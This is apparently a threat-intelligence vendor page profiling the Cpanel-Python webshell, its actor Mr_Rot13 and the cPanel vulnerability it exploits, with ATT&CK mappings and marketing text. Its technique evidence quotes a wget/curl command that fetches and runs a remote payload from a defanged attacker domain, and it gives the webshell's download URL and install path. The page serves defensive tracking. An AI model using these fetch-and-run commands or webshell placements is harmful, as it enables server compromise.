MalwareRansomwareUsed by 1 actorExploits 1 CVE

Cpanel-Python

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES

CVE-2026-41940cPanel & WHM Authentication Bypass via Session-File CRLF Injection

植入PHP Webshell, 对应的处理函数为main_installCpanelPy Webshell的下载地址为 https:]//cp.dene.de.]com/cpanel.py ,本地路径为/usr/local/cpanel/cgi-sys/cpanel.py。这个Webshell的名字是Cpanel-Python,支持文件上传&浏览,以及远程命令执行等功能。

via qianxin xlab blogblog.xlab.qianxin.com

THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

Mr_Rot13

via qianxin xlab blogblog.xlab.qianxin.com

MITRE ATT&CK

Techniques & procedures

4 distinct techniques documented for this family, organized by ATT&CK tactic.

Persistence

2 techniques

T1505Server Software ComponentEvidence1

implant SSH public keys, PHP Webshells, and malicious JS code, deploy the filemanager remote-control tool

T1505.003Web ShellEvidence2

Implant PHP Webshell... The Webshell's download address is https:]//cp.dene.de.]com/cpanel.py , with a local path of /usr/local/cpanel/cgi-sys/cpanel.py. This Webshell is named Cpanel-Python and supports file upload & browsing, as well as remote command execution.

Stealth

1 technique

T1036MasqueradingEvidence1

这个所谓的Update文件就是我们前文所说的Payload感染器... Webshell的名字是Cpanel-Python... 名为helper的PHP文件... 前部分代码来自WordPress系统文件options.php

Command and Control

1 technique

T1105Ingress Tool TransferEvidence2

Its function is to request a malicious payload named Update from the download server cp.dene.[de.com , and run it continuously in the background using the nohup command... wget -q -O "$F" 'https://cp.dene.[de.com/Update' ... || curl -sk -o "$F" 'https://cp.dene.[de.com/Update'

INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

1 tracked

IPs, domains, and DNS infrastructure linked to this family.

TypeValueLatest sighting

domain●●●●●●●●●●●●View more in app1 month ago

ACTIVITY FEED

Recent activity

2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

2 SOURCESView more in app

qianxin xlab blogNews

May 11, 2026

秘密活动6年的神秘黑客组织Mr_Rot13正在利用cPanel高危漏洞部署后门木马

A PHP webshell dropped onto compromised cPanel systems that supports file upload, file browsing, and remote command execution.

qianxin xlab blogNews

May 11, 2026

Threat Actor Mr_Rot13 Actively Exploits CVE-2026-41940 for Backdoor Deployment

A PHP webshell implanted into compromised cPanel systems that supports file upload, file browsing, and remote command execution.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching1

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping4

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.